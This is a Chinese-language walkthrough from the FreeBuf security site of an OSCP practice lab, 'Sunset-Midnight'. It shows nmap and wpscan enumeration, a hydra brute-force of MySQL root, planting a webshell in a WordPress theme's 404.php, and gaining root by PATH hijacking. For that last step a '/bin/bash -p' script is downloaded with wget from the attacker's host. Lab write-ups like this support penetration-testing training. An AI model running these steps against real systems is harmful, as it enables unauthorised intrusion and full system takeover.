OSCP46靶场-- SUNSET-MIDNIGHT
文章描述了一次完整的攻击链过程:通过信息收集、端口扫描、漏洞利用、密码爆破等手段入侵目标系统,并通过反弹shell、文件修改、权限提升等操作最终获得root权限。过程中涉及WordPress渗透测试、MySQL密码破解、命令劫持和环境变量劫持等多种技术手段。 2025-9-18 09:17:30 Author: www.freebuf.com(查看原文) 阅读量:1 收藏

freeBuf

主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

攻击链

收集端口服务、目录等信息---找到后台,爆破3306端口---登录后台,修改文件,反弹shell---翻找文件,提权至普通用户---命令劫持&&环境变量劫持,提权至root

过程

信息收集

ports=$(nmap -p- --min-rate=1000  -T4 172.16.33.92 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -A  -p$ports 172.16.33.92  > n1.txt

1758166057_68cb7c29ebcf6881dee19.png!small?1758166056364

22端口的私钥、账户应该是从80、3306端口获得,或者,获得用户名字典进行爆破。

这里先访问80端口。当遇到网页显示异常时,先添加域名映射,这里nmap的扫描结果有显示可能的域名。

sudo vim /etc/hosts

1758166264_68cb7cf87290a58512b08.png!small?1758166262776

扫描结果显示为wordpress,

那么,上wpscan

wpscan --url http://sunset-midnight/   --enumerate vp,vt,u --api-token XXXX

1758176268_68cba40c9f1679e564b66.png!small?1758176266896

1758176668_68cba59ce90140758fd9d.png!small?1758176667542

先说结果,没有可利用的漏洞。但是有后台网址,

1758176498_68cba4f2d65edce5601fa.png!small?1758176497080

1758176478_68cba4debfe14b3b5bbd0.png!small?1758176476979

对比回显可知,admin为用户之一,并且一般这个名字就是站点管理员。尝试爆破,但没有爆破出结果来。(我爆破了3h)。那,还有一个3306端口,一般数据库的最高权限用户就是root,那就先按照root做一下爆破,

hydra -l root   -P rockyou.txt  172.16.33.92  mysql  -t 16

爆破结果:root  robert

连接过去看看,

mysql -h 172.16.33.92 -uroot -p --skip-ssl

1758182302_68cbbb9e7cf9293b65862.png!small?1758182300673

这里,密码并不能被爆破,那就直接改掉。

1758182315_68cbbbabb0cfd7a66070f.png!small?1758182314306

突破边界

登录wp后台

其实wpscan有很多漏洞,但我一一尝试都不能利用。登录以后,要在文件上传、插件安装、插件版本、能修改的php文件处尝试。这里我本来尝试了一个插件漏洞,但是插件甚至不能安装。

还有一点,wp可以选择主题,无法成功修改当前主题的文件。可以修改未被使用的主题,然后激活被修改的主题,我就是尝试了好几次,发现无论如何都不能改成功。

这里我先把404.php直接用webshell文件替换了,

1758183093_68cbbeb541d7c305c1c12.png!small?1758183091836

1758183124_68cbbed41a3e19d8068ed.png!small?1758183122311

显示失败。但是尝试修改别的主题的404.php却成功了。

1758183269_68cbbf65b395fc85ed4b7.png!small?1758183268075

那就activate改掉的主题。

1758183294_68cbbf7e959729dab0fea.png!small?1758183292920

这里有个执行路径的问题。既然使用该主题,那运行的时候一定用的就是文件夹,那直接访问即可。

1758183750_68cbc14611725d046f8e9.png!small?1758183748173

突破边界成功

1758183765_68cbc1553f7f29c9fdcdf.png!small?1758183763436

提权普通用户

这里我尝试了能做的,但是没能提权,然后发现没尝试翻文件。就在/var/www/html/wordpress/wp-config.php   有一说一,这串字符看起来像md5加密过的

1758184910_68cbc5ce719a1b9293f27.png!small?1758184908784

但我md5没有解密出来,尝试直接用了,还真行

1758185122_68cbc6a28db780d689af1.png!small?1758185120753

提权至最高用户

一样的,也是很多方式都尝试了一遍,没招了。结果是suid提权,命令劫持。

find / -perm -u=s -type f 2>/dev/null  

1758185378_68cbc7a23bae0e2fb733e.png!small?1758185376359

从这里是看不出什么来的,还得上linpeas

1758186201_68cbcad9bd4b033a1839d.png!small?1758186200050

有非标准系统的文件。看过了,没有该命令的C文件,所以执行看看有什么用处

1758185847_68cbc97765e46e5f6f4a1.png!small?1758185845610

打印下该二进制文件的所有​​可打印的字符串。

strings status

1758186004_68cbca148cc056e6db81d.png!small?1758186002654

1758186119_68cbca871ba73fb6bd116.png!small?1758186117218

1758186129_68cbca9148d6a5af5dae2.png!small?1758186127435

在kali写一个恶意脚本,让靶机下载

echo ‘/bin/bash -p’ > service

wget http://10.8.0.74:8000/service

chmod +x service

1758186768_68cbcd1061dc8dabc254b.png!small?1758186766582

1758186794_68cbcd2a72153756a6b43.png!small?1758186792489

设置环境变量

export PATH=/tmp:$PATH

当高权限的 /usr/bin/status程序运行时,它会去 PATH里寻找 service,并首先找到并执行 /tmp/service。这样,攻击者的恶意脚本就以 ​​root 权限​​ 执行了。如图:

1758186896_68cbcd90c7d7269a649ba.png!small?1758186894884

免责声明

1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。

2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。

3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。

本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)


文章来源: https://www.freebuf.com/articles/web/449311.html
如有侵权请联系:admin#unsafe.sh